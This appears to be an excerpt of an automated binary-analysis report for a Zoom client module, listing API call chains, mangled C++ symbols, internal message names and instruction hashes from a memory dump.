                • Concurrency::cancel_current_task.LIBCPMT ref: 00C66AD4
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Cmm@@Concurrency::cancel_current_taskFacet_H_prolog3RegisterState@Unlock@
                • String ID:
                • API String ID: 3531389548-0
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CC09C7
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00D3E0D4,00000030), ref: 00CC09DD
                  • Part of subcall function 00C54490: __EH_prolog3.LIBCMT ref: 00C54497
                • ?SplitString@?$CStringT@_W@Cmm@@QBE?AV?$vector@V?$CStringT@_W@Cmm@@V?$allocator@V?$CStringT@_W@Cmm@@@std@@@std@@ABV12@H@Z.RWSNDPQSKZ(?,?,00000001,00D3E0D4,00000030), ref: 00CC09F2
                  • Part of subcall function 00C53860: __EH_prolog3_GS.LIBCMT ref: 00C53867
                  • Part of subcall function 00C53860: ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(?,?,?,00000000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00C538EB
                  • Part of subcall function 00C53860: ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(?,?,00000000,000000FF,?,00000000,?,?,?,?,00000034), ref: 00C5393F
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                • ?TrimLeft@?$CStringT@_W@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,00D3E0D4,00000030), ref: 00CC0A14
                • ?TrimRight@?$CStringT@_W@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,00D3E0D4,00000030), ref: 00CC0A1B
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00D34CD0,?,?,?,?,?,?,?,?,?,?,00D3E0D4,00000030), ref: 00CC0A34
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00D3E0D4,00000030), ref: 00CC0A4E
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: String$Cmm@@$??0?$$H_prolog3_TrimU?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@$Cmm@@@std@@@std@@DeallocateH_prolog3Left@?$Right@?$SplitString@?$V01@@V12@V?$allocator@V?$vector@
                • String ID:
                • API String ID: 2979155003-0
                APIs
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000004,00000000,filename=<null>,?,?,00CB3FAB,?,00000001,00000000,000001C4,00CA5C1C), ref: 00CB25A6
                  • Part of subcall function 00CB28E0: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,?,00CB23DA,?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?), ref: 00CB28FE
                  • Part of subcall function 00CB28E0: ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB2982
                • ?Clear@XMLDocument@tinyxml2@@QAEXXZ.RWSNDPQSKZ(?,?,?,00CB3FAB,?,00000001,00000000,000001C4,00CA5C1C,?,?,?,?,?,0000003C), ref: 00CB25B1
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000003,00000000,filename=%s,00000000,?,?,?,00CB3FAB,?,00000001,00000000,000001C4,00CA5C1C), ref: 00CB25D5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Document@tinyxml2@@$Error@Error@2@Pair@tinyxml2@@$Clear@Reset@Str@
                • String ID: filename=%s$filename=<null>
                • API String ID: 3203997174-1949359620
                APIs
                • __EH_prolog3.LIBCMT ref: 00C720C7
                • ??0?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.endvideo.notify,00009E73,EndType,ReasonCode,PTNotified,00000004), ref: 00C720EC
                  • Part of subcall function 00C8A780: __EH_prolog3.LIBCMT ref: 00C8A787
                  • Part of subcall function 00C8A780: ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8A6A5,?,?,?,?,?,00000004,00C7CD68,?,?,?), ref: 00C8A79D
                  • Part of subcall function 00C915F2: __EH_prolog3_GS.LIBCMT ref: 00C915F9
                  • Part of subcall function 00C915F2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91625
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91653
                  • Part of subcall function 00C915F2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91690
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm), ref: 00C916C0
                  • Part of subcall function 00C915F2: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp), ref: 00C9172C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$H_prolog3MessagePackageStringTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@Tree
                • String ID: EndType$PTNotified$ReasonCode$com.zoom.app.cci.ccivideo.endvideo.notify
                • API String ID: 2610200052-2839026390
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A267
                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C6A28C
                  • Part of subcall function 00C88CE0: __EH_prolog3.LIBCMT ref: 00C88CE7
                  • Part of subcall function 00C88CE0: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C6A291,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88CFD
                  • Part of subcall function 00C88F0D: __EH_prolog3_GS.LIBCMT ref: 00C88F14
                  • Part of subcall function 00C88F0D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F40
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F6E
                  • Part of subcall function 00C88F0D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88FAB
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value), ref: 00C88FDB
                  • Part of subcall function 00C88F0D: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name), ref: 00C89047
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@
                • String ID: Name$Service$Value$com.zoom.app.UpdateFeatureToggle
                • API String ID: 491978956-1326807880
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A467
                • ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.notifyStartLogin,0000272E,Reason,MeetingID,Password,00000004), ref: 00C6A48C
                  • Part of subcall function 00C85460: __EH_prolog3.LIBCMT ref: 00C85467
                  • Part of subcall function 00C85460: ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C85365,?,?,?,?,?,00000004,00C7FCD8,?,?,?), ref: 00C8547D
                  • Part of subcall function 00C88F0D: __EH_prolog3_GS.LIBCMT ref: 00C88F14
                  • Part of subcall function 00C88F0D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F40
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F6E
                  • Part of subcall function 00C88F0D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88FAB
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value), ref: 00C88FDB
                  • Part of subcall function 00C88F0D: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name), ref: 00C89047
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@
                • String ID: MeetingID$Password$Reason$com.zoom.app.notifyStartLogin
                • API String ID: 491978956-3204209225
                APIs
                • __EH_prolog3.LIBCMT ref: 00C705F7
                • ??0?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.realname.auth.info,00002752,IsLogin,SignUpURL,BindPhoneURL,00000004), ref: 00C7061C
                  • Part of subcall function 00C875B0: __EH_prolog3.LIBCMT ref: 00C875B7
                  • Part of subcall function 00C875B0: ??0?$CmmMessageTemplate_2@HV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C874D5,?,?,?,?,?,00000004,00C7F508,?,?,?), ref: 00C875CD
                  • Part of subcall function 00C8DE55: __EH_prolog3_GS.LIBCMT ref: 00C8DE5C
                  • Part of subcall function 00C8DE55: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DE88
                  • Part of subcall function 00C8DE55: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DEB6
                  • Part of subcall function 00C8DE55: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DEF3
                  • Part of subcall function 00C8DE55: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid), ref: 00C8DF23
                  • Part of subcall function 00C8DE55: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result), ref: 00C8DF8F
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$Cmm@@@CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@@
                • String ID: BindPhoneURL$IsLogin$SignUpURL$com.Zoom.app.conf.realname.auth.info
                • API String ID: 3310136194-1378626793
                • Opcode ID: e2d61ed9727405c73a2d55222666db6eb5ba429866e91a2d13af543f657e0016
                • Instruction ID: ee443c71be91382bb7e01c3097d440e62ed83f1df49b0b1c8449cd85f1c827e3
                • Opcode Fuzzy Hash: e2d61ed9727405c73a2d55222666db6eb5ba429866e91a2d13af543f657e0016
                • Instruction Fuzzy Hash: 97F0E5B0644354FAD710AF009C06B292364EB50F18F10853CB1045E3C2CBF08C05DB39
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74597
                • ??0?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.assistant.voice.command.status.notification,00009D35,type,status,indicateID,00000004), ref: 00C745BC
                  • Part of subcall function 00C8A780: __EH_prolog3.LIBCMT ref: 00C8A787
                  • Part of subcall function 00C8A780: ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8A6A5,?,?,?,?,?,00000004,00C7CD68,?,?,?), ref: 00C8A79D
                  • Part of subcall function 00C915F2: __EH_prolog3_GS.LIBCMT ref: 00C915F9
                  • Part of subcall function 00C915F2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91625
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91653
                  • Part of subcall function 00C915F2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91690
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm), ref: 00C916C0
                  • Part of subcall function 00C915F2: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp), ref: 00C9172C
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$H_prolog3MessagePackageStringTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@Tree
                • String ID: com.zoom.app.assistant.voice.command.status.notification$indicateID$status$type
                • API String ID: 2610200052-2905355676
                • Opcode ID: 5c54005cd712f47ae63adf6dd2266a578140cbe99a526988fe63e59fc4b06bbb
                • Instruction ID: 11b888ae131c07a552a1c715d3d31ea696bb9df528efce86c9bb7451b445e7e4
                • Opcode Fuzzy Hash: 5c54005cd712f47ae63adf6dd2266a578140cbe99a526988fe63e59fc4b06bbb
                • Instruction Fuzzy Hash: DDF02BB1640781FBE7106B049C86B6E72A4DB80B59F510418F1045E7C2C7F00D48D775
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72567
                • ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@HH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.muteaudio.request,00009E7D,UserID,AudioOn,FromDevice,00000004), ref: 00C7258C
                  • Part of subcall function 00C92B00: __EH_prolog3.LIBCMT ref: 00C92B07
                  • Part of subcall function 00C92B00: ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C72591,com.zoom.app.cci.ccivideo.muteaudio.request,00009E7D,UserID,AudioOn,FromDevice,00000004), ref: 00C92B1D
                  • Part of subcall function 00C8D759: __EH_prolog3_GS.LIBCMT ref: 00C8D760
                  • Part of subcall function 00C8D759: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6D501,com.zoom.app.assistant.sip.onCallRecordingResult.notification,CallID,ActionType,Result,com.zoom.app.assistant.sip.onCallRecordingResult.notification,00009CC2,CallID,ActionType,Result,00000004), ref: 00C8D78C
                  • Part of subcall function 00C8D759: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6D501,com.zoom.app.assistant.sip.onCallRecordingResult.notification,CallID,ActionType,Result,com.zoom.app.assistant.sip.onCallRecordingResult.notification,00009CC2,CallID,ActionType,Result,00000004), ref: 00C8D7BA
                  • Part of subcall function 00C8D759: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6D501,com.zoom.app.assistant.sip.onCallRecordingResult.notification,CallID,ActionType,Result,com.zoom.app.assistant.sip.onCallRecordingResult.notification,00009CC2,CallID,ActionType,Result,00000004), ref: 00C8D7F7
                  • Part of subcall function 00C8D759: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6D501,com.zoom.app.assistant.sip.onCallRecordingResult.notification,CallID,ActionType,Result,com.zoom.app.assistant.sip.onCallRecordingResult.notification,00009CC2,CallID,ActionType,Result), ref: 00C8D827
                  • Part of subcall function 00C8D759: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6D501,com.zoom.app.assistant.sip.onCallRecordingResult.notification,CallID,ActionType,Result,com.zoom.app.assistant.sip.onCallRecordingResult.notification,00009CC2,CallID), ref: 00C8D893
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@Tree
                • String ID: AudioOn$FromDevice$UserID$com.zoom.app.cci.ccivideo.muteaudio.request
                • API String ID: 2695935728-1587232973
                • Opcode ID: 0e2bf14ca96d39b8718d444889795c770f26eef50c171c218c601167985dcb35
                • Instruction ID: 6d4a3027ffaab7837b9a18fed984dc18ad5803fab5f9c79114c7a064ddbb4cf1
                • Opcode Fuzzy Hash: 0e2bf14ca96d39b8718d444889795c770f26eef50c171c218c601167985dcb35
                • Instruction Fuzzy Hash: 96F0E5B0B81384BBD7106B54BC1BB2A66B4AF40B16F008528B1046A3D1CBF14C44C772
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76647
                • ??0?$CmmMessageTemplate_3@HV?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.ps.update_key_value_info,00013884,type,key,value,00000004), ref: 00C7666C
                  • Part of subcall function 00C875B0: __EH_prolog3.LIBCMT ref: 00C875B7
                  • Part of subcall function 00C875B0: ??0?$CmmMessageTemplate_2@HV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C874D5,?,?,?,?,?,00000004,00C7F508,?,?,?), ref: 00C875CD
                  • Part of subcall function 00C8DE55: __EH_prolog3_GS.LIBCMT ref: 00C8DE5C
                  • Part of subcall function 00C8DE55: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DE88
                  • Part of subcall function 00C8DE55: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DEB6
                  • Part of subcall function 00C8DE55: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DEF3
                  • Part of subcall function 00C8DE55: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid), ref: 00C8DF23
                  • Part of subcall function 00C8DE55: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result), ref: 00C8DF8F
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$Cmm@@@CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@@
                • String ID: com.zoom.ps.update_key_value_info$key$type$value
                • API String ID: 3310136194-2826525806
                • Opcode ID: 6cf2af30a29f9386e6ae25b2a659ef7ee9a663daa42a1f8094783b39b2a0741c
                • Instruction ID: 50b3a57df0196b33dcda3cb4b1b8e55f2a41ee08d41f775223ece8e6b8342112
                • Opcode Fuzzy Hash: 6cf2af30a29f9386e6ae25b2a659ef7ee9a663daa42a1f8094783b39b2a0741c
                • Instruction Fuzzy Hash: BEF0EDE0785B84FADB156F089C86B6AA2A4A780B5AF500128B1006E3C2CAF80A08D775
                APIs
                • __EH_prolog3.LIBCMT ref: 00C727A7
                • ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.invitebyphone.request,00009E83,CountryCode,PhoneNumber,Name,00000004), ref: 00C727CC
                  • Part of subcall function 00C85460: __EH_prolog3.LIBCMT ref: 00C85467
                  • Part of subcall function 00C85460: ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C85365,?,?,?,?,?,00000004,00C7FCD8,?,?,?), ref: 00C8547D
                  • Part of subcall function 00C88F0D: __EH_prolog3_GS.LIBCMT ref: 00C88F14
                  • Part of subcall function 00C88F0D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F40
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F6E
                  • Part of subcall function 00C88F0D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88FAB
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value), ref: 00C88FDB
                  • Part of subcall function 00C88F0D: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name), ref: 00C89047
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@
                • String ID: CountryCode$Name$PhoneNumber$com.zoom.app.cci.ccivideo.invitebyphone.request
                • API String ID: 491978956-1565034923
                • Opcode ID: 8dbc73ae8e4f767aaa09e508ccfcb980edeb44d500255b1d04a0775a7f78c0d1
                • Instruction ID: b843c573f4ad7326ee520d16f1a8cd3b80e9bdfe037526cc8faa9b21a4f7eafe
                • Opcode Fuzzy Hash: 8dbc73ae8e4f767aaa09e508ccfcb980edeb44d500255b1d04a0775a7f78c0d1
                • Instruction Fuzzy Hash: ACF06DB0B407957FE710BB54AC86F2AA2A4BB80F19F55412CF2545A3C2CAF94D48C775
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70717
                • ??0?$CmmMessageTemplate_3@HV?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.assistant.upload.exception.memory.log.request,00009CE5,TroubleType,TroubleTime,TroubleReason,00000004), ref: 00C7073C
